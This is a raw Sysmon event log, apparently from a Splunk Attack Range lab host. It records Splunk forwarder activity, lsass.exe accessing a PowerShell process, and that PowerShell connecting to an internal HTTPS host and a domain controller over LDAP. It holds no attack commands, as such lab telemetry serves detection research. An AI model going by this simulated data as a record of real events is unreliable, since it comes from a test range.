Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086265Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:44.307{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086264Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:44.307{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086263Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:44.307{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086262Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:44.306{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086261Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:44.306{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-5004-613A-8590-03000000C801}5256C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035086260Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:44.306{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-5004-613A-8590-03000000C801}5256C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035086259Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:44.287{B81B27B7-5004-613A-8590-03000000C801}5256C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035086282Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:45.374{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56D320F43B1B1204C0669D91F8066CC1,SHA256=165A27165A551449B6673D52ECC015C0645597287A6E280CC53412046E9A014D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086281Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:09.865{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56822-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035086280Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:09.212{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56821-false10.0.1.12-8000- 23542300x800000000000000035086279Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:45.027{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0F973335CB2375FBE6E6728E26D9EA81,SHA256=73F15C11A35ACE3D63D2D366DD31B3FEFBF5C299384C00C7B74B00F7E149050C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035086278Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:45.011{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-5004-613A-8690-03000000C801}6484C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086277Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:45.009{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086276Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:45.009{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086275Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:45.009{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086274Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:45.009{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086273Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:45.008{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-5004-613A-8690-03000000C801}6484C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035086272Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:45.008{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-5004-613A-8690-03000000C801}6484C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035086271Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:44.992{B81B27B7-5004-613A-8690-03000000C801}6484C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035086284Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:46.409{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F87359A898391776E7A3E5BF5B54A72C,SHA256=413507A7CF67FA46356C622CCE2251E78E5D8BCA3019227A2E940742BAEF2AE3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086283Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:46.042{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DB5E53393571D0992DE66CCC1E80FD5B,SHA256=EBA714A1C053BFA0DACEF4B710674FE2DC78FE8A0DE3F7EBEAB477C863652AD0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086285Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:47.425{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5348621EFE1CFF1B505F57A4FEC33AF,SHA256=B2805DFD572694DF5E1DDE01D590692FA572E65AD8740A7528AB155C0BAEB324,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035086288Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:48.886{B81B27B7-4012-611D-0B00-00000000C801}6362096C:\Windows\system32\lsass.exe{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086287Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:48.886{B81B27B7-4012-611D-0B00-00000000C801}6362096C:\Windows\system32\lsass.exe{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035086286Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:48.440{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1399E3C02BCBF96176637EFC5F755B6B,SHA256=6FAF9C8CFA105A81D1DFDF29ACBD4F9D9E0824C2C9FD5FC18DD95287767FDC00,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086290Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:49.867{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9EABC1E51477FC0324D0640075C433BE,SHA256=56A8431A96EE717868CF7ED5CEFB58D869C8FD25659AAFF4F14172AFCE054419,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086289Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:49.456{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E450037DD9AAC1B5AA853896D13E44D9,SHA256=29A39E9B4AA1E1EBB51DBA1B3F8928A014F7B6C9428EC28929341ED13419B034,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086293Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:50.466{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D4E754983E7F314F05DF6D82C46C028,SHA256=0F022B843FE0A9D10F527136B00BFE9E7B23D286212CB1245C6923BA6DB146AE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086292Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:14.915{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56824-false10.0.1.14WIN-DC-128389ldap 354300x800000000000000035086291Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:14.881{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56823-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035086297Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:51.515{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8615BBC0920885FA8A9CF262B2E97B0,SHA256=3F728F0D3F636559E757A4354407A9BE1FCA485C94D684117D032367BA43EFB7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086296Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:15.526{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56827-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035086295Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:15.227{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56826-false10.0.1.12-8000- 354300x800000000000000035086294Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:14.920{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56825-false10.0.1.14WIN-DC-128389ldap 23542300x800000000000000035086298Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:52.534{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=424A920E9E1C353F45AACB623AC12692,SHA256=A8D5333D15F7929A6909ACFE9C5E4018AD4A73A3905F11116905CABA75D0D3E4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086299Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:53.548{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1049DDDB7BAB305AAEC352C575BDFD11,SHA256=32021C92DA355A22E7DD13C5B1D4AA0DF1522D87AD677C5D13942C8F25E8C29A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086301Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:54.594{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34230DB5750043709B20AF21A289574F,SHA256=E1253D9CDA032F1327D426F37BBCD56B327210539060F667F466F744C10D177B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 